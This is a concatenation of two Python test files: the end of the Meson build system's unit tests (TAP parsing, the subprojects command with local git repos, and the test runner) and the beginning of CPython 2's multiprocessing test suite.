self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, count=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few_bailout(self):
events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
self.assert_plan(events, count=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_bailout(events, message='no third test')
self.assert_last(events)
def test_diagnostics(self):
events = self.parse_tap('1..1\n# ignored\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_empty_line(self):
events = self.parse_tap('1..1\n\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_unexpected(self):
events = self.parse_tap('1..1\ninvalid\nok 1')
self.assert_plan(events, count=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_version(self):
events = self.parse_tap('TAP version 13\n')
self.assert_version(events, version=13)
self.assert_last(events)
events = self.parse_tap('TAP version 12\n')
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..0\nTAP version 13\n')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_error(events)
self.assert_last(events)
def test_yaml(self):
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_last(events)
class SubprojectsCommandTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.root_dir = Path(self.builddir)
self.project_dir = self.root_dir / 'src'
self._create_project(self.project_dir)
self.subprojects_dir = self.project_dir / 'subprojects'
os.makedirs(str(self.subprojects_dir))
def _create_project(self, path, project_name='dummy'):
os.makedirs(str(path), exist_ok=True)
with open(str(path / 'meson.build'), 'w') as f:
f.write("project('{}')".format(project_name))
def _git(self, cmd, workdir):
return git(cmd, str(workdir), check=True)[1].strip()
def _git_config(self, workdir):
self._git(['config', 'user.name', 'Meson Test'], workdir)
self._git(['config', 'user.email', 'meson.test@example.com'], workdir)
def _git_remote(self, cmd, name):
return self._git(cmd, self.root_dir / name)
def _git_local(self, cmd, name):
return self._git(cmd, self.subprojects_dir / name)
def _git_local_branch(self, name):
# Same as `git branch --show-current` but compatible with older git versions
branch = self._git_local(['rev-parse', '--abbrev-ref', 'HEAD'], name)
return branch if branch != 'HEAD' else ''
def _git_local_commit(self, name, ref='HEAD'):
return self._git_local(['rev-parse', ref], name)
def _git_remote_commit(self, name, ref='HEAD'):
return self._git_remote(['rev-parse', ref], name)
def _git_create_repo(self, path):
self._create_project(path)
self._git(['init'], path)
self._git_config(path)
self._git(['add', '.'], path)
self._git(['commit', '-m', 'Initial commit'], path)
def _git_create_remote_repo(self, name):
self._git_create_repo(self.root_dir / name)
def _git_create_local_repo(self, name):
self._git_create_repo(self.subprojects_dir / name)
def _git_create_remote_commit(self, name, branch):
self._git_remote(['checkout', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)
def _git_create_remote_branch(self, name, branch):
self._git_remote(['checkout', '-b', branch], name)
self._git_remote(['commit', '--allow-empty', '-m', 'initial {} commit'.format(branch)], name)
def _git_create_remote_tag(self, name, tag):
self._git_remote(['commit', '--allow-empty', '-m', 'tag {} commit'.format(tag)], name)
self._git_remote(['tag', tag], name)
def _wrap_create_git(self, name, revision='master'):
path = self.root_dir / name
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-git]
url={}
revision={}
'''.format(os.path.abspath(str(path)), revision)))
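# The generated wrap file (e.g. subprojects/sub1.wrap) looks roughly like
# this; in practice the url is an absolute path to the fake remote repo:
#   [wrap-git]
#   url=/abs/path/to/builddir/sub1
#   revision=master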
def _wrap_create_file(self, name, tarball='dummy.tar.gz'):
path = self.root_dir / tarball
with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
f.write(textwrap.dedent(
'''
[wrap-file]
source_url={}
'''.format(os.path.abspath(str(path)))))
def _subprojects_cmd(self, args):
return self._run(self.meson_command + ['subprojects'] + args, workdir=str(self.project_dir))
def test_git_update(self):
subp_name = 'sub1'
# Create a fake remote git repository and a wrap file. Checks that
# "meson subprojects download" works.
self._git_create_remote_repo(subp_name)
self._wrap_create_git(subp_name)
self._subprojects_cmd(['download'])
self.assertPathExists(str(self.subprojects_dir / subp_name))
self._git_config(self.subprojects_dir / subp_name)
# Create a new remote branch and update the wrap file. Checks that
# "meson subprojects update --reset" checks out the new branch.
self._git_create_remote_branch(subp_name, 'newbranch')
self._wrap_create_git(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch. Checks that the new commit is pulled into the
# existing local newbranch. Make sure it does not print a spurious
# 'git stash' message.
self._git_create_remote_commit(subp_name, 'newbranch')
out = self._subprojects_cmd(['update', '--reset'])
self.assertNotIn('No local changes to save', out)
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Update remote newbranch and switch to another branch. Checks that it
# switches the current branch back to newbranch and pulls the latest commit.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
# Stage some local changes then update. Checks that local changes got
# stashed.
self._create_project(self.subprojects_dir / subp_name, 'new_project_name')
self._git_local(['add', '.'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
self.assertTrue(self._git_local(['stash', 'list'], subp_name))
# Create a new remote tag and update the wrap file. Checks that
# "meson subprojects update --reset" checks out the new tag in detached mode.
self._git_create_remote_tag(subp_name, 'newtag')
self._wrap_create_git(subp_name, 'newtag')
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newtag'))
# Create a new remote commit and update the wrap file with the commit id.
# Checks that "meson subprojects update --reset" checks out the new commit
# in detached mode.
self._git_local(['checkout', 'master'], subp_name)
self._git_create_remote_commit(subp_name, 'newbranch')
new_commit = self._git_remote(['rev-parse', 'HEAD'], subp_name)
self._wrap_create_git(subp_name, new_commit)
self._subprojects_cmd(['update', '--reset'])
self.assertEqual(self._git_local_branch(subp_name), '')
self.assertEqual(self._git_local_commit(subp_name), new_commit)
@skipIfNoExecutable('true')
def test_foreach(self):
self._create_project(self.subprojects_dir / 'sub_file')
self._wrap_create_file('sub_file')
self._git_create_local_repo('sub_git')
self._wrap_create_git('sub_git')
self._git_create_local_repo('sub_git_no_wrap')
def ran_in(s):
ret = []
prefix = 'Executing command in '
for l in s.splitlines():
if l.startswith(prefix):
ret.append(l[len(prefix):])
return sorted(ret)
dummy_cmd = ['true']
out = self._subprojects_cmd(['foreach'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git', 'subprojects/sub_git_no_wrap']))
out = self._subprojects_cmd(['foreach', '--types', 'git,file'] + dummy_cmd)
self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git']))
out = self._subprojects_cmd(['foreach', '--types', 'file'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_file'])
out = self._subprojects_cmd(['foreach', '--types', 'git'] + dummy_cmd)
self.assertEqual(ran_in(out), ['subprojects/sub_git'])
def _clang_at_least(compiler, minver: str, apple_minver: str) -> bool:
"""
Check that the Clang compiler is at least a specified version, whether AppleClang or regular Clang.
Parameters
----------
compiler:
Meson compiler object
minver: str
Clang minimum version
apple_minver: str
AppleClang minimum version
Returns
-------
at_least: bool
Clang is at least the specified version
"""
if isinstance(compiler, (mesonbuild.compilers.AppleClangCCompiler,
mesonbuild.compilers.AppleClangCPPCompiler)):
return version_compare(compiler.version, apple_minver)
return version_compare(compiler.version, minver)
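# Illustrative call: _clang_at_least(compiler, '>=10.0', '>=12.0') is True only
# when the detected Clang (or AppleClang) meets the respective minimum version.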
def unset_envs():
# For unit tests we must fully control all command lines
# so that there are no unexpected changes coming from the
# environment, for example when doing a package build.
varnames = ['CPPFLAGS', 'LDFLAGS'] + list(mesonbuild.compilers.compilers.cflags_mapping.values())
for v in varnames:
if v in os.environ:
del os.environ[v]
def convert_args(argv):
# If we got passed a list of tests, pass it on
pytest_args = ['-v'] if '-v' in argv else []
test_list = []
for arg in argv:
if arg.startswith('-'):
if arg in ('-f', '--failfast'):
arg = '--exitfirst'
pytest_args.append(arg)
continue
# ClassName.test_name => 'ClassName and test_name'
if '.' in arg:
arg = ' and '.join(arg.split('.'))
test_list.append(arg)
if test_list:
pytest_args += ['-k', ' or '.join(test_list)]
return pytest_args
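# Illustrative example: convert_args(['AllPlatformTests.test_foo']) returns
# ['-k', 'AllPlatformTests and test_foo'], i.e. a ClassName.test_name selector
# becomes a pytest -k expression. ('test_foo' is a hypothetical test name.)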
def running_single_tests(argv, cases):
'''
Check whether we only got arguments for running individual tests, not
entire testcases, and not all testcases (no test args).
'''
got_test_arg = False
for arg in argv:
if arg.startswith('-'):
continue
for case in cases:
if not arg.startswith(case):
continue
if '.' not in arg:
# Got a testcase, done
return False
got_test_arg = True
return got_test_arg
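# Illustrative behaviour: running_single_tests(['AllPlatformTests.test_foo'], cases)
# is True (only individual tests were named), while passing ['AllPlatformTests']
# or no test arguments at all returns False.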
def main():
unset_envs()
cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
'TAPParserTests', 'SubprojectsCommandTests',
'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
'WindowsTests', 'DarwinTests']
# Don't use pytest-xdist when running single unit tests, since in that case it
# wastes time spawning a lot of worker processes just to distribute the tests.
if not running_single_tests(sys.argv, cases):
try:
import pytest # noqa: F401
# Need pytest-xdist for `-n` arg
import xdist # noqa: F401
pytest_args = ['-n', 'auto', './run_unittests.py']
pytest_args += convert_args(sys.argv[1:])
return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
except ImportError:
print('pytest-xdist not found, using unittest instead')
# Fallback to plain unittest.
return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
start = time.monotonic()
try:
raise SystemExit(main())
finally:
print('Total time: {:.3f} seconds'.format(time.monotonic() - start))
|
test_multiprocessing.py
|
#!/usr/bin/env python
#
# Unit tests for the multiprocessing package
#
import unittest
import Queue
import time
import sys
import os
import gc
import signal
import array
import socket
import random
import logging
import errno
from test import test_support
from StringIO import StringIO
_multiprocessing = test_support.import_module('_multiprocessing')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
# Work around broken sem_open implementations
test_support.import_module('multiprocessing.synchronize')
import multiprocessing.dummy
import multiprocessing.connection
import multiprocessing.managers
import multiprocessing.heap
import multiprocessing.pool
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = True
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
latin = str
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
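# Typical usage in the tests below: wrap a blocking call, then assert on how
# long it took, e.g.
#   put = TimingWrapper(queue.put)
#   self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
#   self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)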
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
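# It tries the public get_value() first, then falls back to the private
# _Semaphore__value / _value attributes used by some implementations, and
# raises NotImplementedError if none of them exist.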
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
return
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
@classmethod
def _test_terminate(cls):
time.sleep(1000)
def test_terminate(self):
if self.TYPE == 'threads':
return
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
p.terminate()
join = TimingWrapper(p.join)
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
from multiprocessing import forking
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(Queue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(Queue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(Queue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(Queue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(Queue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
return
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
if sys.version_info < (2, 5) and not hasattr(queue, 'task_done'):
self.skipTest("requires 'queue.task_done()' method")
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in xrange(4)]
for p in workers:
p.daemon = True
p.start()
for i in xrange(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
return
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in xrange(6):
sleeping.acquire()
# check they have all timed out
for i in xrange(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in xrange(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
